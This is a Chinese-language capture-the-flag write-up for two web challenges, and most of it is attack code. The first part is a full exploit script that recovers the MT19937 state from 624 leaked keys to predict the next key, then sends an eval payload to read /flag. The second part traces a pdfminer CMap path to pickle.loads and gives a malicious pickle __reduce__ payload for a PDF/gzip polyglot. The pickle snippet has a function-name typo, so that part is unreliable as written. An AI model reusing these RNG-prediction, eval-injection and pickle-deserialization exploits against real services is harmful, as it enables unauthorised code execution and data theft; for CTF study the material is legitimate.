连发 624 次请求收集 624 个 32-bit 输出,重建 MT19937 的内部状态,从而预测下一次 getrandbits(32) 的值。这样在第 625 次请求中,直接把 key 设置为下一次将要生成的 key2,即可通过校验
执行代码这里显然把 builtins 拼错成 builtin了(少个s),所以这里并不是沙箱
eval(payload, {'__builtin__':{}})
最后使用 session 写入 flag,从响应的 set-cookie 读取 flag
exp:
import requests
import sys
import re
import json
import base64
import zlib
from typing import List
N = 624
M = 397
MATRIX_A = 0x9908B0DF
UPPER_MASK = 0x80000000
LOWER_MASK = 0x7fffffff
def unshift_right_xor(y: int, shift: int) -> int:
x = 0
for i in range(31, -1, -1):
yi = (y >> i) & 1
if i + shift <= 31:
xi = yi ^ ((x >> (i + shift)) & 1)
else:
xi = yi
x |= xi << i
return x & 0xffffffff
def unshift_left_xor_mask(y: int, shift: int, mask: int) -> int:
x = 0
for i in range(32):
yi = (y >> i) & 1
if i - shift >= 0 and ((mask >> i) & 1):
xi = yi ^ ((x >> (i - shift)) & 1)
else:
xi = yi
x |= xi << i
return x & 0xffffffff
def untemper(y: int) -> int:
y = unshift_right_xor(y, 18)
y = unshift_left_xor_mask(y, 15, 0xEFC60000)
y = unshift_left_xor_mask(y, 7, 0x9D2C5680)
y = unshift_right_xor(y, 11)
return y & 0xffffffff
class MTPredictor:
def __init__(self):
self.mt = [0] * N
self.index = N
def seed_with_untempered(self, vals: List[int]):
assert len(vals) == N
self.mt = [v & 0xffffffff for v in vals]
self.index = N
def twist(self):
for i in range(N):
y = (self.mt[i] & UPPER_MASK) | (self.mt[(i + 1) % N] & LOWER_MASK)
self.mt[i] = self.mt[(i + M) % N] ^ (y >> 1)
if y & 1:
self.mt[i] ^= MATRIX_A
self.index = 0
def extract_number(self) -> int:
if self.index >= N:
self.twist()
y = self.mt[self.index]
# temper
y ^= (y >> 11)
y ^= (y << 7) & 0x9D2C5680
y ^= (y << 15) & 0xEFC60000
y ^= (y >> 18)
self.index += 1
return y & 0xffffffff
def parse_leak_message(msg: str) -> int:
m = re.search(r'Not Allowed:(\\d+)', msg)
if not m:
raise ValueError(f"Unexpected message: {msg!r}")
return int(m.group(1))
def decode_flask_session(cookie_value: str) -> dict:
# Flask session cookie = "<data>.<sig>"
payload = cookie_value.split('.', 1)[0]
payload += '=' * (-len(payload) % 4)
raw = base64.urlsafe_b64decode(payload.encode())
try:
raw = zlib.decompress(raw)
except Exception:
pass
return json.loads(raw.decode('utf-8'))
def exploit(base_url: str):
s = requests.Session()
api = base_url.rstrip('/') + '/api'
leaks = []
for i in range(N):
r = s.post(api, json={'key': 'x'}, timeout=10)
if r.status_code not in (400, 403):
print(f'[!] Unexpected status at i={i}: {r.status_code}, body={r.text}')
sys.exit(1)
try:
data = r.json()
except Exception:
print(f'[!] Non-JSON response at i={i}: {r.text[:200]}')
sys.exit(1)
if 'message' not in data:
print(f'[!] No message field at i={i}: {data}')
sys.exit(1)
k2 = parse_leak_message(data['message'])
leaks.append(k2)
if (i + 1) % 50 == 0 or i == N - 1:
print(f' collected {i+1}/{N}')
state = [untemper(v) for v in leaks]
pred = MTPredictor()
pred.seed_with_untempered(state)
next_key = pred.extract_number()
print(f'Next key2 = {next_key}')
payload = "__import__('flask').session.update({'flag':__import__('builtins').open('/flag').read()})"
r = s.post(api, json={'key': str(next_key), 'payload': payload}, timeout=10)
cookie = r.cookies.get('session') or s.cookies.get('session')
s = decode_flask_session(cookie)
flag = s.get('flag')
print(flag)
if __name__ == '__main__':
exploit('<http://43.138.4.37:30250/>')
应用本身的代码比较正常,没有可疑点,结合题干来看应该是在用到的库里找利用点。在pdfminer/cmapdb.py中找到 pickle.loads:
class CMapDB:
_cmap_cache: Dict[str, PyCMap] = {}
_umap_cache: Dict[str, List[PyUnicodeMap]] = {}
class CMapNotFound(CMapError):
pass
@classmethod
def _load_data(cls, name: str) -> Any:
name = name.replace("\\0", "")
filename = "%s.pickle.gz" % name
log.debug("loading: %r", name)
cmap_paths = (
os.environ.get("CMAP_PATH", "/usr/share/pdfminer/"),
os.path.join(os.path.dirname(__file__), "cmap"),
)
for directory in cmap_paths:
path = os.path.join(directory, filename)
if os.path.exists(path):
gzfile = gzip.open(path)
try:
return type(str(name), (), pickle.loads(gzfile.read()))
finally:
gzfile.close()
raise CMapDB.CMapNotFound(name)
这里是当成 gz 加载的,文件名需要是 .pickle.gz 结尾。它在两个目录下查找并读取:环境变量 CMAP_PATH(默认 /usr/share/pdfminer/)与包内 pdfminer/cmap/
这个 name 可控,来自 PDF 中的 CMap 名,或 ToUnicode CMap 流里的 usecmap 操作数,若 name 为绝对路径,os.path.join(directory, name) 会直接返回绝对路径,就可以绕过内置目录限制
分析调用链:
->pdfutils.pdf_to_text
->pdfminer.high_level.extract_pages
->PDFPageInterpreter.process_page
->PDFPageInterpreter.render_contents
->PDFPageInterpreter.init_resources
->PDFResourceManager.get_font
->PDFCIDFont.__init__
->PDFCIDFont.get_cmap_from_spec
->CMapDB.get_cmap
->CMapDB._load_data
->pickle.loads
app.py会把报错回显:
**try:
pdf_to_text(pdf_path, txt_path)
except Exception as e:
return str(e), 500**
所以这样构造pickle序列化数据:
from pathlib import Path
import pickle
def build_yload_raw(out="payload.raw"):
expr = "(_ for _ in ()).throw(Exception(open('/flag','r').read()))"
class R:
def __reduce__(self):
return (eval, (expr,))
data = pickle.dumps(R(), protocol=pickle.HIGHEST_PROTOCOL)
Path(out).write_bytes(data)
return data
if __name__ == "__main__":
build_payload_raw()
要使文件既能被 extract_pages 当作 PDF 通过 PDF 校验,又能被 gzip.open 正常解压。可以把一个有效 PDF 放在 gzip 头部的 Comment 字段